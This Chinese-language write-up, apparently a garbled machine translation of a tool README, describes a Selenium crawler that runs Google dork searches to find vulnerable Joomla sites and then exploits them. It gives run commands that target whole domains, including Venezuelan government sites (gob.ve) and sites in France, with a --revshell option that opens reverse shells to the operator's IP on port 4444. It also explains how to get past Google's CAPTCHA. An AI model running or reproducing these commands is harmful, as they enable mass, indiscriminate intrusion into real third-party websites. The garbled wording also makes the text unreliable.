这是一款根据谷歌搜索引擎的自动化爬虫。
爬虫介绍
爬虫大体机制便是：
先进行一次谷歌搜索，将成果解析为特定格局，然后再提供给exp运用。
我们能够测验运用–help来列出一切参数。
这个项目笔者会持续更新，今后再增加新的exp进行晋级。此外，它会运用google_parsers模块去构建exp解析搜索成果，所以当你开端搜索时，能够挑选“–exploit parser”参数来指定相应exp。
google parsers模块（google_parsers.py）今后还会持续优化，而现在的exp只含有joomla cve，究竟这个项目首要是给我们自己diy运用的。可是，假如你不会弄exp，把运用exp提交给过来也行。
因为笔者平常仍是比较忙，所以没有太多时刻去手动搜索方针。故而，笔者测验运用Selenium框架去造了个爬虫来查找测验方针。至于搜索过程中呈现的Google的验证码，它需求其他库和模块来辅佐处理。在项目里运用Selenium后，我们就能够在谷歌呈现验证码的是时分，自行手动输入验证码，然后爬虫就能够持续爬行了。这大概是笔者能想出的最好的处理验证码防护的办法了。
简略概述下爬虫是怎么作业的：
1. 履行谷歌搜索
2. 从每一页解析成果
3. 测验是否成果中含有缝隙
依靠与需求
这个项目需求python3，运用requirements装置依靠库的办法如下：
$ sudo pip install -r requirements.txt
运转示例：
python3 google_explorer.py --dork="site:*.com inurl:index.php?option=" --browser="chrome" --exploit_parser="joomla_15_12_2019_rce" --revshell="MY_PUBLIC_IP" --port=4444 --google_domain="google.com" --location="França" --last_update="no último mês"
在上面的比方里，笔者是在寻觅法国的joomla RCE方针，运用的是google_domains.txt里边的google域名（比方google.co.uk）来作为搜索引擎，“–last_update”则代表着搜索成果的更新时刻为上个月。
上面比方里的选项适用于任何言语，首要决定于google针对相应的国家给出的语法。
下面再给出一个简略的比方：
python3 google_explorer.py --browser='chrome' --dork='site:gob.ve inurl:index.php' --location="Venezuela"
当然，这些exp也是能够独自运用的：
$ cd xpl_parsers
$ python joomla_cve_2019_8562.py
独自测验exp的办法：
$ cd exploits
$ python exploiter.py --file